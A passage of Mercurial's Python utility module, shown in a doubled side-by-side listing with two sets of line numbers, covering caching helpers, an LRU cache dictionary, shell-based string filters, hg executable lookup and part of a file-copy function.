548 "%Y-%m",
560 "%Y-%m",
549 "%b",
561 "%b",
550 "%b %Y",
562 "%b %Y",
551 )
563 )
552
564
553 def cachefunc(func):
565 def cachefunc(func):
554 '''cache the result of function calls'''
566 '''cache the result of function calls'''
555 # XXX doesn't handle keywords args
567 # XXX doesn't handle keywords args
556 if func.__code__.co_argcount == 0:
568 if func.__code__.co_argcount == 0:
557 cache = []
569 cache = []
558 def f():
570 def f():
559 if len(cache) == 0:
571 if len(cache) == 0:
560 cache.append(func())
572 cache.append(func())
561 return cache[0]
573 return cache[0]
562 return f
574 return f
563 cache = {}
575 cache = {}
564 if func.__code__.co_argcount == 1:
576 if func.__code__.co_argcount == 1:
565 # we gain a small amount of time because
577 # we gain a small amount of time because
566 # we don't need to pack/unpack the list
578 # we don't need to pack/unpack the list
567 def f(arg):
579 def f(arg):
568 if arg not in cache:
580 if arg not in cache:
569 cache[arg] = func(arg)
581 cache[arg] = func(arg)
570 return cache[arg]
582 return cache[arg]
571 else:
583 else:
572 def f(*args):
584 def f(*args):
573 if args not in cache:
585 if args not in cache:
574 cache[args] = func(*args)
586 cache[args] = func(*args)
575 return cache[args]
587 return cache[args]
576
588
577 return f
589 return f
578
590
579 class sortdict(collections.OrderedDict):
591 class sortdict(collections.OrderedDict):
580 '''a simple sorted dictionary
592 '''a simple sorted dictionary
581
593
582 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
594 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
583 >>> d2 = d1.copy()
595 >>> d2 = d1.copy()
584 >>> d2
596 >>> d2
585 sortdict([('a', 0), ('b', 1)])
597 sortdict([('a', 0), ('b', 1)])
586 >>> d2.update([(b'a', 2)])
598 >>> d2.update([(b'a', 2)])
587 >>> list(d2.keys()) # should still be in last-set order
599 >>> list(d2.keys()) # should still be in last-set order
588 ['b', 'a']
600 ['b', 'a']
589 '''
601 '''
590
602
591 def __setitem__(self, key, value):
603 def __setitem__(self, key, value):
592 if key in self:
604 if key in self:
593 del self[key]
605 del self[key]
594 super(sortdict, self).__setitem__(key, value)
606 super(sortdict, self).__setitem__(key, value)
595
607
596 if pycompat.ispypy:
608 if pycompat.ispypy:
597 # __setitem__() isn't called as of PyPy 5.8.0
609 # __setitem__() isn't called as of PyPy 5.8.0
598 def update(self, src):
610 def update(self, src):
599 if isinstance(src, dict):
611 if isinstance(src, dict):
600 src = src.iteritems()
612 src = src.iteritems()
601 for k, v in src:
613 for k, v in src:
602 self[k] = v
614 self[k] = v
603
615
604 class transactional(object):
616 class transactional(object):
605 """Base class for making a transactional type into a context manager."""
617 """Base class for making a transactional type into a context manager."""
606 __metaclass__ = abc.ABCMeta
618 __metaclass__ = abc.ABCMeta
607
619
608 @abc.abstractmethod
620 @abc.abstractmethod
609 def close(self):
621 def close(self):
610 """Successfully closes the transaction."""
622 """Successfully closes the transaction."""
611
623
612 @abc.abstractmethod
624 @abc.abstractmethod
613 def release(self):
625 def release(self):
614 """Marks the end of the transaction.
626 """Marks the end of the transaction.
615
627
616 If the transaction has not been closed, it will be aborted.
628 If the transaction has not been closed, it will be aborted.
617 """
629 """
618
630
619 def __enter__(self):
631 def __enter__(self):
620 return self
632 return self
621
633
622 def __exit__(self, exc_type, exc_val, exc_tb):
634 def __exit__(self, exc_type, exc_val, exc_tb):
623 try:
635 try:
624 if exc_type is None:
636 if exc_type is None:
625 self.close()
637 self.close()
626 finally:
638 finally:
627 self.release()
639 self.release()
628
640
629 @contextlib.contextmanager
641 @contextlib.contextmanager
630 def acceptintervention(tr=None):
642 def acceptintervention(tr=None):
631 """A context manager that closes the transaction on InterventionRequired
643 """A context manager that closes the transaction on InterventionRequired
632
644
633 If no transaction was provided, this simply runs the body and returns
645 If no transaction was provided, this simply runs the body and returns
634 """
646 """
635 if not tr:
647 if not tr:
636 yield
648 yield
637 return
649 return
638 try:
650 try:
639 yield
651 yield
640 tr.close()
652 tr.close()
641 except error.InterventionRequired:
653 except error.InterventionRequired:
642 tr.close()
654 tr.close()
643 raise
655 raise
644 finally:
656 finally:
645 tr.release()
657 tr.release()
646
658
647 @contextlib.contextmanager
659 @contextlib.contextmanager
648 def nullcontextmanager():
660 def nullcontextmanager():
649 yield
661 yield
650
662
651 class _lrucachenode(object):
663 class _lrucachenode(object):
652 """A node in a doubly linked list.
664 """A node in a doubly linked list.
653
665
654 Holds a reference to nodes on either side as well as a key-value
666 Holds a reference to nodes on either side as well as a key-value
655 pair for the dictionary entry.
667 pair for the dictionary entry.
656 """
668 """
657 __slots__ = (u'next', u'prev', u'key', u'value')
669 __slots__ = (u'next', u'prev', u'key', u'value')
658
670
659 def __init__(self):
671 def __init__(self):
660 self.next = None
672 self.next = None
661 self.prev = None
673 self.prev = None
662
674
663 self.key = _notset
675 self.key = _notset
664 self.value = None
676 self.value = None
665
677
666 def markempty(self):
678 def markempty(self):
667 """Mark the node as emptied."""
679 """Mark the node as emptied."""
668 self.key = _notset
680 self.key = _notset
669
681
670 class lrucachedict(object):
682 class lrucachedict(object):
671 """Dict that caches most recent accesses and sets.
683 """Dict that caches most recent accesses and sets.
672
684
673 The dict consists of an actual backing dict - indexed by original
685 The dict consists of an actual backing dict - indexed by original
674 key - and a doubly linked circular list defining the order of entries in
686 key - and a doubly linked circular list defining the order of entries in
675 the cache.
687 the cache.
676
688
677 The head node is the newest entry in the cache. If the cache is full,
689 The head node is the newest entry in the cache. If the cache is full,
678 we recycle head.prev and make it the new head. Cache accesses result in
690 we recycle head.prev and make it the new head. Cache accesses result in
679 the node being moved to before the existing head and being marked as the
691 the node being moved to before the existing head and being marked as the
680 new head node.
692 new head node.
681 """
693 """
682 def __init__(self, max):
694 def __init__(self, max):
683 self._cache = {}
695 self._cache = {}
684
696
685 self._head = head = _lrucachenode()
697 self._head = head = _lrucachenode()
686 head.prev = head
698 head.prev = head
687 head.next = head
699 head.next = head
688 self._size = 1
700 self._size = 1
689 self._capacity = max
701 self._capacity = max
690
702
691 def __len__(self):
703 def __len__(self):
692 return len(self._cache)
704 return len(self._cache)
693
705
694 def __contains__(self, k):
706 def __contains__(self, k):
695 return k in self._cache
707 return k in self._cache
696
708
697 def __iter__(self):
709 def __iter__(self):
698 # We don't have to iterate in cache order, but why not.
710 # We don't have to iterate in cache order, but why not.
699 n = self._head
711 n = self._head
700 for i in range(len(self._cache)):
712 for i in range(len(self._cache)):
701 yield n.key
713 yield n.key
702 n = n.next
714 n = n.next
703
715
704 def __getitem__(self, k):
716 def __getitem__(self, k):
705 node = self._cache[k]
717 node = self._cache[k]
706 self._movetohead(node)
718 self._movetohead(node)
707 return node.value
719 return node.value
708
720
709 def __setitem__(self, k, v):
721 def __setitem__(self, k, v):
710 node = self._cache.get(k)
722 node = self._cache.get(k)
711 # Replace existing value and mark as newest.
723 # Replace existing value and mark as newest.
712 if node is not None:
724 if node is not None:
713 node.value = v
725 node.value = v
714 self._movetohead(node)
726 self._movetohead(node)
715 return
727 return
716
728
717 if self._size < self._capacity:
729 if self._size < self._capacity:
718 node = self._addcapacity()
730 node = self._addcapacity()
719 else:
731 else:
720 # Grab the last/oldest item.
732 # Grab the last/oldest item.
721 node = self._head.prev
733 node = self._head.prev
722
734
723 # At capacity. Kill the old entry.
735 # At capacity. Kill the old entry.
724 if node.key is not _notset:
736 if node.key is not _notset:
725 del self._cache[node.key]
737 del self._cache[node.key]
726
738
727 node.key = k
739 node.key = k
728 node.value = v
740 node.value = v
729 self._cache[k] = node
741 self._cache[k] = node
730 # And mark it as newest entry. No need to adjust order since it
742 # And mark it as newest entry. No need to adjust order since it
731 # is already self._head.prev.
743 # is already self._head.prev.
732 self._head = node
744 self._head = node
733
745
734 def __delitem__(self, k):
746 def __delitem__(self, k):
735 node = self._cache.pop(k)
747 node = self._cache.pop(k)
736 node.markempty()
748 node.markempty()
737
749
738 # Temporarily mark as newest item before re-adjusting head to make
750 # Temporarily mark as newest item before re-adjusting head to make
739 # this node the oldest item.
751 # this node the oldest item.
740 self._movetohead(node)
752 self._movetohead(node)
741 self._head = node.next
753 self._head = node.next
742
754
743 # Additional dict methods.
755 # Additional dict methods.
744
756
745 def get(self, k, default=None):
757 def get(self, k, default=None):
746 try:
758 try:
747 return self._cache[k].value
759 return self._cache[k].value
748 except KeyError:
760 except KeyError:
749 return default
761 return default
750
762
751 def clear(self):
763 def clear(self):
752 n = self._head
764 n = self._head
753 while n.key is not _notset:
765 while n.key is not _notset:
754 n.markempty()
766 n.markempty()
755 n = n.next
767 n = n.next
756
768
757 self._cache.clear()
769 self._cache.clear()
758
770
759 def copy(self):
771 def copy(self):
760 result = lrucachedict(self._capacity)
772 result = lrucachedict(self._capacity)
761 n = self._head.prev
773 n = self._head.prev
762 # Iterate in oldest-to-newest order, so the copy has the right ordering
774 # Iterate in oldest-to-newest order, so the copy has the right ordering
763 for i in range(len(self._cache)):
775 for i in range(len(self._cache)):
764 result[n.key] = n.value
776 result[n.key] = n.value
765 n = n.prev
777 n = n.prev
766 return result
778 return result
767
779
768 def _movetohead(self, node):
780 def _movetohead(self, node):
769 """Mark a node as the newest, making it the new head.
781 """Mark a node as the newest, making it the new head.
770
782
771 When a node is accessed, it becomes the freshest entry in the LRU
783 When a node is accessed, it becomes the freshest entry in the LRU
772 list, which is denoted by self._head.
784 list, which is denoted by self._head.
773
785
774 Visually, let's make ``N`` the new head node (* denotes head):
786 Visually, let's make ``N`` the new head node (* denotes head):
775
787
776 previous/oldest <-> head <-> next/next newest
788 previous/oldest <-> head <-> next/next newest
777
789
778 ----<->--- A* ---<->-----
790 ----<->--- A* ---<->-----
779 | |
791 | |
780 E <-> D <-> N <-> C <-> B
792 E <-> D <-> N <-> C <-> B
781
793
782 To:
794 To:
783
795
784 ----<->--- N* ---<->-----
796 ----<->--- N* ---<->-----
785 | |
797 | |
786 E <-> D <-> C <-> B <-> A
798 E <-> D <-> C <-> B <-> A
787
799
788 This requires the following moves:
800 This requires the following moves:
789
801
790 C.next = D (node.prev.next = node.next)
802 C.next = D (node.prev.next = node.next)
791 D.prev = C (node.next.prev = node.prev)
803 D.prev = C (node.next.prev = node.prev)
792 E.next = N (head.prev.next = node)
804 E.next = N (head.prev.next = node)
793 N.prev = E (node.prev = head.prev)
805 N.prev = E (node.prev = head.prev)
794 N.next = A (node.next = head)
806 N.next = A (node.next = head)
795 A.prev = N (head.prev = node)
807 A.prev = N (head.prev = node)
796 """
808 """
797 head = self._head
809 head = self._head
798 # C.next = D
810 # C.next = D
799 node.prev.next = node.next
811 node.prev.next = node.next
800 # D.prev = C
812 # D.prev = C
801 node.next.prev = node.prev
813 node.next.prev = node.prev
802 # N.prev = E
814 # N.prev = E
803 node.prev = head.prev
815 node.prev = head.prev
804 # N.next = A
816 # N.next = A
805 # It is tempting to do just "head" here, however if node is
817 # It is tempting to do just "head" here, however if node is
806 # adjacent to head, this will do bad things.
818 # adjacent to head, this will do bad things.
807 node.next = head.prev.next
819 node.next = head.prev.next
808 # E.next = N
820 # E.next = N
809 node.next.prev = node
821 node.next.prev = node
810 # A.prev = N
822 # A.prev = N
811 node.prev.next = node
823 node.prev.next = node
812
824
813 self._head = node
825 self._head = node
814
826
815 def _addcapacity(self):
827 def _addcapacity(self):
816 """Add a node to the circular linked list.
828 """Add a node to the circular linked list.
817
829
818 The new node is inserted before the head node.
830 The new node is inserted before the head node.
819 """
831 """
820 head = self._head
832 head = self._head
821 node = _lrucachenode()
833 node = _lrucachenode()
822 head.prev.next = node
834 head.prev.next = node
823 node.prev = head.prev
835 node.prev = head.prev
824 node.next = head
836 node.next = head
825 head.prev = node
837 head.prev = node
826 self._size += 1
838 self._size += 1
827 return node
839 return node
828
840
829 def lrucachefunc(func):
841 def lrucachefunc(func):
830 '''cache most recent results of function calls'''
842 '''cache most recent results of function calls'''
831 cache = {}
843 cache = {}
832 order = collections.deque()
844 order = collections.deque()
833 if func.__code__.co_argcount == 1:
845 if func.__code__.co_argcount == 1:
834 def f(arg):
846 def f(arg):
835 if arg not in cache:
847 if arg not in cache:
836 if len(cache) > 20:
848 if len(cache) > 20:
837 del cache[order.popleft()]
849 del cache[order.popleft()]
838 cache[arg] = func(arg)
850 cache[arg] = func(arg)
839 else:
851 else:
840 order.remove(arg)
852 order.remove(arg)
841 order.append(arg)
853 order.append(arg)
842 return cache[arg]
854 return cache[arg]
843 else:
855 else:
844 def f(*args):
856 def f(*args):
845 if args not in cache:
857 if args not in cache:
846 if len(cache) > 20:
858 if len(cache) > 20:
847 del cache[order.popleft()]
859 del cache[order.popleft()]
848 cache[args] = func(*args)
860 cache[args] = func(*args)
849 else:
861 else:
850 order.remove(args)
862 order.remove(args)
851 order.append(args)
863 order.append(args)
852 return cache[args]
864 return cache[args]
853
865
854 return f
866 return f
855
867
856 class propertycache(object):
868 class propertycache(object):
857 def __init__(self, func):
869 def __init__(self, func):
858 self.func = func
870 self.func = func
859 self.name = func.__name__
871 self.name = func.__name__
860 def __get__(self, obj, type=None):
872 def __get__(self, obj, type=None):
861 result = self.func(obj)
873 result = self.func(obj)
862 self.cachevalue(obj, result)
874 self.cachevalue(obj, result)
863 return result
875 return result
864
876
865 def cachevalue(self, obj, value):
877 def cachevalue(self, obj, value):
866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
878 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
867 obj.__dict__[self.name] = value
879 obj.__dict__[self.name] = value
868
880
869 def pipefilter(s, cmd):
881 def pipefilter(s, cmd):
870 '''filter string S through command CMD, returning its output'''
882 '''filter string S through command CMD, returning its output'''
871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
883 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
884 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
873 pout, perr = p.communicate(s)
885 pout, perr = p.communicate(s)
874 return pout
886 return pout
875
887
876 def tempfilter(s, cmd):
888 def tempfilter(s, cmd):
877 '''filter string S through a pair of temporary files with CMD.
889 '''filter string S through a pair of temporary files with CMD.
878 CMD is used as a template to create the real command to be run,
890 CMD is used as a template to create the real command to be run,
879 with the strings INFILE and OUTFILE replaced by the real names of
891 with the strings INFILE and OUTFILE replaced by the real names of
880 the temporary files generated.'''
892 the temporary files generated.'''
881 inname, outname = None, None
893 inname, outname = None, None
882 try:
894 try:
883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
895 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
896 fp = os.fdopen(infd, pycompat.sysstr('wb'))
885 fp.write(s)
897 fp.write(s)
886 fp.close()
898 fp.close()
887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
899 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
888 os.close(outfd)
900 os.close(outfd)
889 cmd = cmd.replace('INFILE', inname)
901 cmd = cmd.replace('INFILE', inname)
890 cmd = cmd.replace('OUTFILE', outname)
902 cmd = cmd.replace('OUTFILE', outname)
891 code = os.system(cmd)
903 code = os.system(cmd)
892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
904 if pycompat.sysplatform == 'OpenVMS' and code & 1:
893 code = 0
905 code = 0
894 if code:
906 if code:
895 raise Abort(_("command '%s' failed: %s") %
907 raise Abort(_("command '%s' failed: %s") %
896 (cmd, explainexit(code)))
908 (cmd, explainexit(code)))
897 return readfile(outname)
909 return readfile(outname)
898 finally:
910 finally:
899 try:
911 try:
900 if inname:
912 if inname:
901 os.unlink(inname)
913 os.unlink(inname)
902 except OSError:
914 except OSError:
903 pass
915 pass
904 try:
916 try:
905 if outname:
917 if outname:
906 os.unlink(outname)
918 os.unlink(outname)
907 except OSError:
919 except OSError:
908 pass
920 pass
909
921
910 filtertable = {
922 filtertable = {
911 'tempfile:': tempfilter,
923 'tempfile:': tempfilter,
912 'pipe:': pipefilter,
924 'pipe:': pipefilter,
913 }
925 }
914
926
915 def filter(s, cmd):
927 def filter(s, cmd):
916 "filter a string through a command that transforms its input to its output"
928 "filter a string through a command that transforms its input to its output"
917 for name, fn in filtertable.iteritems():
929 for name, fn in filtertable.iteritems():
918 if cmd.startswith(name):
930 if cmd.startswith(name):
919 return fn(s, cmd[len(name):].lstrip())
931 return fn(s, cmd[len(name):].lstrip())
920 return pipefilter(s, cmd)
932 return pipefilter(s, cmd)
921
933
922 def binary(s):
934 def binary(s):
923 """return true if a string is binary data"""
935 """return true if a string is binary data"""
924 return bool(s and '\0' in s)
936 return bool(s and '\0' in s)
925
937
926 def increasingchunks(source, min=1024, max=65536):
938 def increasingchunks(source, min=1024, max=65536):
927 '''return no less than min bytes per chunk while data remains,
939 '''return no less than min bytes per chunk while data remains,
928 doubling min after each chunk until it reaches max'''
940 doubling min after each chunk until it reaches max'''
929 def log2(x):
941 def log2(x):
930 if not x:
942 if not x:
931 return 0
943 return 0
932 i = 0
944 i = 0
933 while x:
945 while x:
934 x >>= 1
946 x >>= 1
935 i += 1
947 i += 1
936 return i - 1
948 return i - 1
937
949
938 buf = []
950 buf = []
939 blen = 0
951 blen = 0
940 for chunk in source:
952 for chunk in source:
941 buf.append(chunk)
953 buf.append(chunk)
942 blen += len(chunk)
954 blen += len(chunk)
943 if blen >= min:
955 if blen >= min:
944 if min < max:
956 if min < max:
945 min = min << 1
957 min = min << 1
946 nmin = 1 << log2(blen)
958 nmin = 1 << log2(blen)
947 if nmin > min:
959 if nmin > min:
948 min = nmin
960 min = nmin
949 if min > max:
961 if min > max:
950 min = max
962 min = max
951 yield ''.join(buf)
963 yield ''.join(buf)
952 blen = 0
964 blen = 0
953 buf = []
965 buf = []
954 if buf:
966 if buf:
955 yield ''.join(buf)
967 yield ''.join(buf)
956
968
957 Abort = error.Abort
969 Abort = error.Abort
958
970
959 def always(fn):
971 def always(fn):
960 return True
972 return True
961
973
962 def never(fn):
974 def never(fn):
963 return False
975 return False
964
976
965 def nogc(func):
977 def nogc(func):
966 """disable garbage collector
978 """disable garbage collector
967
979
968 Python's garbage collector triggers a GC each time a certain number of
980 Python's garbage collector triggers a GC each time a certain number of
969 container objects (the number being defined by gc.get_threshold()) are
981 container objects (the number being defined by gc.get_threshold()) are
970 allocated even when marked not to be tracked by the collector. Tracking has
982 allocated even when marked not to be tracked by the collector. Tracking has
971 no effect on when GCs are triggered, only on what objects the GC looks
983 no effect on when GCs are triggered, only on what objects the GC looks
972 into. As a workaround, disable GC while building complex (huge)
984 into. As a workaround, disable GC while building complex (huge)
973 containers.
985 containers.
974
986
975 This garbage collector issue have been fixed in 2.7. But it still affect
987 This garbage collector issue have been fixed in 2.7. But it still affect
976 CPython's performance.
988 CPython's performance.
977 """
989 """
978 def wrapper(*args, **kwargs):
990 def wrapper(*args, **kwargs):
979 gcenabled = gc.isenabled()
991 gcenabled = gc.isenabled()
980 gc.disable()
992 gc.disable()
981 try:
993 try:
982 return func(*args, **kwargs)
994 return func(*args, **kwargs)
983 finally:
995 finally:
984 if gcenabled:
996 if gcenabled:
985 gc.enable()
997 gc.enable()
986 return wrapper
998 return wrapper
987
999
988 if pycompat.ispypy:
1000 if pycompat.ispypy:
989 # PyPy runs slower with gc disabled
1001 # PyPy runs slower with gc disabled
990 nogc = lambda x: x
1002 nogc = lambda x: x
991
1003
992 def pathto(root, n1, n2):
1004 def pathto(root, n1, n2):
993 '''return the relative path from one place to another.
1005 '''return the relative path from one place to another.
994 root should use os.sep to separate directories
1006 root should use os.sep to separate directories
995 n1 should use os.sep to separate directories
1007 n1 should use os.sep to separate directories
996 n2 should use "/" to separate directories
1008 n2 should use "/" to separate directories
997 returns an os.sep-separated path.
1009 returns an os.sep-separated path.
998
1010
999 If n1 is a relative path, it's assumed it's
1011 If n1 is a relative path, it's assumed it's
1000 relative to root.
1012 relative to root.
1001 n2 should always be relative to root.
1013 n2 should always be relative to root.
1002 '''
1014 '''
1003 if not n1:
1015 if not n1:
1004 return localpath(n2)
1016 return localpath(n2)
1005 if os.path.isabs(n1):
1017 if os.path.isabs(n1):
1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1018 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1007 return os.path.join(root, localpath(n2))
1019 return os.path.join(root, localpath(n2))
1008 n2 = '/'.join((pconvert(root), n2))
1020 n2 = '/'.join((pconvert(root), n2))
1009 a, b = splitpath(n1), n2.split('/')
1021 a, b = splitpath(n1), n2.split('/')
1010 a.reverse()
1022 a.reverse()
1011 b.reverse()
1023 b.reverse()
1012 while a and b and a[-1] == b[-1]:
1024 while a and b and a[-1] == b[-1]:
1013 a.pop()
1025 a.pop()
1014 b.pop()
1026 b.pop()
1015 b.reverse()
1027 b.reverse()
1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1028 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017
1029
1018 def mainfrozen():
1030 def mainfrozen():
1019 """return True if we are a frozen executable.
1031 """return True if we are a frozen executable.
1020
1032
1021 The code supports py2exe (most common, Windows only) and tools/freeze
1033 The code supports py2exe (most common, Windows only) and tools/freeze
1022 (portable, not much used).
1034 (portable, not much used).
1023 """
1035 """
1024 return (safehasattr(sys, "frozen") or # new py2exe
1036 return (safehasattr(sys, "frozen") or # new py2exe
1025 safehasattr(sys, "importers") or # old py2exe
1037 safehasattr(sys, "importers") or # old py2exe
1026 imp.is_frozen(u"__main__")) # tools/freeze
1038 imp.is_frozen(u"__main__")) # tools/freeze
1027
1039
1028 # the location of data files matching the source code
1040 # the location of data files matching the source code
1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1041 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1030 # executable version (py2exe) doesn't support __file__
1042 # executable version (py2exe) doesn't support __file__
1031 datapath = os.path.dirname(pycompat.sysexecutable)
1043 datapath = os.path.dirname(pycompat.sysexecutable)
1032 else:
1044 else:
1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1045 datapath = os.path.dirname(pycompat.fsencode(__file__))
1034
1046
1035 i18n.setdatapath(datapath)
1047 i18n.setdatapath(datapath)
1036
1048
1037 _hgexecutable = None
1049 _hgexecutable = None
1038
1050
1039 def hgexecutable():
1051 def hgexecutable():
1040 """return location of the 'hg' executable.
1052 """return location of the 'hg' executable.
1041
1053
1042 Defaults to $HG or 'hg' in the search path.
1054 Defaults to $HG or 'hg' in the search path.
1043 """
1055 """
1044 if _hgexecutable is None:
1056 if _hgexecutable is None:
1045 hg = encoding.environ.get('HG')
1057 hg = encoding.environ.get('HG')
1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1058 mainmod = sys.modules[pycompat.sysstr('__main__')]
1047 if hg:
1059 if hg:
1048 _sethgexecutable(hg)
1060 _sethgexecutable(hg)
1049 elif mainfrozen():
1061 elif mainfrozen():
1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1062 if getattr(sys, 'frozen', None) == 'macosx_app':
1051 # Env variable set by py2app
1063 # Env variable set by py2app
1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1064 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1053 else:
1065 else:
1054 _sethgexecutable(pycompat.sysexecutable)
1066 _sethgexecutable(pycompat.sysexecutable)
1055 elif (os.path.basename(
1067 elif (os.path.basename(
1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1068 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1069 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1058 else:
1070 else:
1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1071 exe = findexe('hg') or os.path.basename(sys.argv[0])
1060 _sethgexecutable(exe)
1072 _sethgexecutable(exe)
1061 return _hgexecutable
1073 return _hgexecutable
1062
1074
1063 def _sethgexecutable(path):
1075 def _sethgexecutable(path):
1064 """set location of the 'hg' executable"""
1076 """set location of the 'hg' executable"""
1065 global _hgexecutable
1077 global _hgexecutable
1066 _hgexecutable = path
1078 _hgexecutable = path
1067
1079
1068 def _isstdout(f):
1080 def _isstdout(f):
1069 fileno = getattr(f, 'fileno', None)
1081 fileno = getattr(f, 'fileno', None)
1070 return fileno and fileno() == sys.__stdout__.fileno()
1082 return fileno and fileno() == sys.__stdout__.fileno()
1071
1083
1072 def shellenviron(environ=None):
1084 def shellenviron(environ=None):
1073 """return environ with optional override, useful for shelling out"""
1085 """return environ with optional override, useful for shelling out"""
1074 def py2shell(val):
1086 def py2shell(val):
1075 'convert python object into string that is useful to shell'
1087 'convert python object into string that is useful to shell'
1076 if val is None or val is False:
1088 if val is None or val is False:
1077 return '0'
1089 return '0'
1078 if val is True:
1090 if val is True:
1079 return '1'
1091 return '1'
1080 return str(val)
1092 return str(val)
1081 env = dict(encoding.environ)
1093 env = dict(encoding.environ)
1082 if environ:
1094 if environ:
1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1095 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1084 env['HG'] = hgexecutable()
1096 env['HG'] = hgexecutable()
1085 return env
1097 return env
1086
1098
1087 def system(cmd, environ=None, cwd=None, out=None):
1099 def system(cmd, environ=None, cwd=None, out=None):
1088 '''enhanced shell command execution.
1100 '''enhanced shell command execution.
1089 run with environment maybe modified, maybe in different dir.
1101 run with environment maybe modified, maybe in different dir.
1090
1102
1091 if out is specified, it is assumed to be a file-like object that has a
1103 if out is specified, it is assumed to be a file-like object that has a
1092 write() method. stdout and stderr will be redirected to out.'''
1104 write() method. stdout and stderr will be redirected to out.'''
1093 try:
1105 try:
1094 stdout.flush()
1106 stdout.flush()
1095 except Exception:
1107 except Exception:
1096 pass
1108 pass
1097 cmd = quotecommand(cmd)
1109 cmd = quotecommand(cmd)
1098 env = shellenviron(environ)
1110 env = shellenviron(environ)
1099 if out is None or _isstdout(out):
1111 if out is None or _isstdout(out):
1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1112 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1101 env=env, cwd=cwd)
1113 env=env, cwd=cwd)
1102 else:
1114 else:
1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1115 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1116 env=env, cwd=cwd, stdout=subprocess.PIPE,
1105 stderr=subprocess.STDOUT)
1117 stderr=subprocess.STDOUT)
1106 for line in iter(proc.stdout.readline, ''):
1118 for line in iter(proc.stdout.readline, ''):
1107 out.write(line)
1119 out.write(line)
1108 proc.wait()
1120 proc.wait()
1109 rc = proc.returncode
1121 rc = proc.returncode
1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1122 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1111 rc = 0
1123 rc = 0
1112 return rc
1124 return rc
1113
1125
1114 def checksignature(func):
1126 def checksignature(func):
1115 '''wrap a function with code to check for calling errors'''
1127 '''wrap a function with code to check for calling errors'''
1116 def check(*args, **kwargs):
1128 def check(*args, **kwargs):
1117 try:
1129 try:
1118 return func(*args, **kwargs)
1130 return func(*args, **kwargs)
1119 except TypeError:
1131 except TypeError:
1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1132 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1121 raise error.SignatureError
1133 raise error.SignatureError
1122 raise
1134 raise
1123
1135
1124 return check
1136 return check
1125
1137
1126 # a whilelist of known filesystems where hardlink works reliably
1138 # a whilelist of known filesystems where hardlink works reliably
1127 _hardlinkfswhitelist = {
1139 _hardlinkfswhitelist = {
1128 'btrfs',
1140 'btrfs',
1129 'ext2',
1141 'ext2',
1130 'ext3',
1142 'ext3',
1131 'ext4',
1143 'ext4',
1132 'hfs',
1144 'hfs',
1133 'jfs',
1145 'jfs',
1134 'reiserfs',
1146 'reiserfs',
1135 'tmpfs',
1147 'tmpfs',
1136 'ufs',
1148 'ufs',
1137 'xfs',
1149 'xfs',
1138 'zfs',
1150 'zfs',
1139 }
1151 }
1140
1152
1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1153 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 '''copy a file, preserving mode and optionally other stat info like
1154 '''copy a file, preserving mode and optionally other stat info like
1143 atime/mtime
1155 atime/mtime
1144
1156
1145 checkambig argument is used with filestat, and is useful only if
1157 checkambig argument is used with filestat, and is useful only if
1146 destination file is guarded by any lock (e.g. repo.lock or
1158 destination file is guarded by any lock (e.g. repo.lock or
1147 repo.wlock).
1159 repo.wlock).
1148
1160
1149 copystat and checkambig should be exclusive.
1161 copystat and checkambig should be exclusive.
1150 '''
1162 '''
1151 assert not (copystat and checkambig)
1163 assert not (copystat and checkambig)
1152 oldstat = None
1164 oldstat = None
1153 if os.path.lexists(dest):
1165 if os.path.lexists(dest):
1154 if checkambig:
1166 if checkambig:
1155 oldstat = checkambig and filestat.frompath(dest)
1167 oldstat = checkambig and filestat.frompath(dest)
1156 unlink(dest)
1168 unlink(dest)
1157 if hardlink:
1169 if hardlink:
1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1170 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 # unless we are confident that dest is on a whitelisted filesystem.
1171 # unless we are confident that dest is on a whitelisted filesystem.
1160 try:
1172 try:
1161 fstype = getfstype(os.path.dirname(dest))
1173 fstype = getfstype(os.path.dirname(dest))
1162 except OSError:
1174 except OSError:
1163 fstype = None
1175 fstype = None
1164 if fstype not in _hardlinkfswhitelist:
1176 if fstype not in _hardlinkfswhitelist:
1165 hardlink = False
1177 hardlink = False
1166 if hardlink:
1178 if hardlink:
